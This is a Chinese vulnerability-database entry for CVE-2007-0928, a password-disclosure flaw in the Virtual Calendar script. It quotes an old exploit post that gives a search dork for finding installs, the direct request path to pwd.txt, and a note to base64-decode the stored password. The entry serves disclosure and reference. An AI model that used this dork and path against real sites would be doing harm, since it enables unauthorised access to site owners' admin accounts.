Virtual Calendar 网根敏感信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191695 漏洞类型 未知
发布时间 2007-02-14 更新时间 2007-02-14
CVE编号 CVE-2007-0928 CNNVD-ID CNNVD-200702-280
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/86609
https://cxsecurity.com/issue/WLB-2007020043
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-280
|漏洞详情
VirtualCalendar在网根中储存敏感信息,但没有赋予足够的访问控制。远程攻击者可以借助对pwd.txt的一个直接请求,下载编码密码。
|漏洞EXP
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Virtual Calendar <= (pwd.txt) Remote Password Disclosur Vulnerability

Script: Virtual Calendar

DorK: "intitle:Virtual intitle:Calendar intitle:Demo"

URL: 
http://www.scriptsez.net/download/download.php?action=download&p=vcalend
ar.zip&ns=1

Discovered by: BorN To K!LL

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

ExploiT:
~~~~~
www.site.com/[path]/pwd.txt

as we C .... crack the password with bass64 decode ....

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

GreeTz 2 :.
Dr.2  ,  AsbMay  ,  General C  ,  ToOoFa  ,  str0ke  ,  SHiKaA  ,  
ThE-LoRd-Of-CrAcKiNg ...

AsbMay's Group  &  KuW-SeC TeaM  & Dm3R7 TeaM .....

Thanks a lot 2  www.milw0rm.com   ......

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
|受影响的产品
Virtual Calendar Virtual Calendar 0
|参考资料

来源:BUGTRAQ
名称:20070210VirtualCalendar<=(pwd.txt)RemotePasswordDisclosurVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/459844/100/0/threaded
来源:OSVDB
名称:33183
链接:http://osvdb.org/33183
来源:XF
名称:virtualcalendar-pwd-information-disclosure(32446)
链接:http://xforce.iss.net/xforce/xfdb/32446
来源:SREASON
名称:2240
链接:http://securityreason.com/securityalert/2240
来源:SECUNIA
名称:24125
链接:http://secunia.com/advisories/24125